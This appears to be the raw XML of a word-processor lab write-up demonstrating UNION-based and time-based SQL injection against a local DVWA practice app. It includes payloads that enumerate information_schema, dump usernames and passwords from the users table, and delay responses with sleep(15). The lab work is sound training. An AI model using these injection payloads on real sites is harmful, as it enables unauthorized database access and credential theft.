          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Get the information_schema table details </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="C9211E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas;Menlo;Monaco;Lucida Console;Liberation Mono;DejaVu Sans Mono;Bitstream Vera Sans Mono;monospace;serif" w:hAnsi="Consolas;Menlo;Monaco;Lucida Console;Liberation Mono;DejaVu Sans Mono;Bitstream Vera Sans Mono;monospace;serif"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>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http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>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 xml:space="preserve"> and 1=1 union select 1,</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table_name from information_schema.tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas;Menlo;Monaco;Lucida Console;Liberation Mono;DejaVu Sans Mono;Bitstream Vera Sans Mono;monospace;serif" w:hAnsi="Consolas;Menlo;Monaco;Lucida Console;Liberation Mono;DejaVu Sans Mono;Bitstream Vera Sans Mono;monospace;serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:bdr w:val="single" w:sz="2" w:space="6" w:color="DDDDDD"/>
        </w:rPr>
        <w:t>--+ &amp;Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-114300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>386080</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2"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Here we the information_schema table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:color w:val="000000"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:t>http://127.0.0.1/dvwa/vulnerabilites/sqli/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>’ and 1=1 union select 1,group_concat(table_name)from information_schema.tables --+ &amp;submit=submit#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="3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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">step 6:- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Find out the username and password to get into the database</w:t>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2"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>for doing this first we have open t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> users table </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:color w:val="000000"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:t>http://127.0.0.1/dvwa/vulnerabilites/sqli/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>’ and 1=1 union select 1,group_concat(table_name)from information_schema.columns where table_name = “users” --+ &amp;submit=submit#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>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color w:val="C9211E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>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2"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Then get the which you want like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari"/>
          <w:color w:val="000000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> , pass </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:color w:val="000000"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:t>http://127.0.0.1/dvwa/vulnerabilites/sqli/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>’ and 1=1 union select 1,group_concat (user,0x0a,password)from users --+ &amp;submit=submit#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="3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2"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Here we can obsere that the username and password </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>decrypt the password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="11">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>205740</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6120130" cy="34423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2"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we can login into the database with </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>username :- gordonb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>password :- password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Time Based Sql injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>what is time based sql injection ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Time-based SQL injection is a type of inferential injection or blind injection attack. Inferential injection attack is a type of attack in which no data is transferred between the attacker and the database and the attacker won’t be able to get results as easily as in an in-band injection attack. This is why it is also called a blind injection attack. An attacker can reconstruct and make a new database structure inside the database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>In a time-based attack, an attacker sends an SQL command to the server with code to force a delay in the execution of the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The response time indicates whether the result of the query is true or false. Depending on the response, the attacker will execute another query. Because the attacker has to enumerate each character by character, this is usually a slow intrusion technique, especially for large databases.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It is same as blind based but just we making a delay with this command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:t>http://127.0.0.1/dvwa/vulnerabilites/sqli/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and 1=1’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>and sleep(15)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> --+ &amp;submit=submit#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="3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44233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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>When the result came after delay of time then the attack is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>successful</w:t>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color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>When the result came after  just press enter then the attack is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>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Verdana">
    <w:altName w:val="sans-serif"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:altName w:val="Menlo"/>
    <w:charset w:val="00"/>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owasp.org/www-community/attacks/SQL_Injection" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/SQL_Injection" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/dvwa/vulnerabilites/sqli/?id=1" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/dvwa/vulnerabilites/sqli/?id=1" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/dvwa/vulnerabilites/sqli/?id=1" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/dvwa/vulnerabilites/sqli/?id=1"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127.0.0.1/dvwa/vulnerabilites/sqli/?id=1" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><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19</TotalTime>
  <Application>LibreOffice/7.0.3.1$Windows_X86_64 LibreOffice_project/d7547858d014d4cf69878db179d326fc3483e082</Application>
  <Pages>11</Pages>
  <Words>738</Words>
  <Characters>4056</Characters>
  <CharactersWithSpaces>4841</CharactersWithSpaces>
  <Paragraphs>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2020-11-23T15:16:18Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-IN</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-05T10:34:40Z</dcterms:modified>
  <cp:revision>5</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>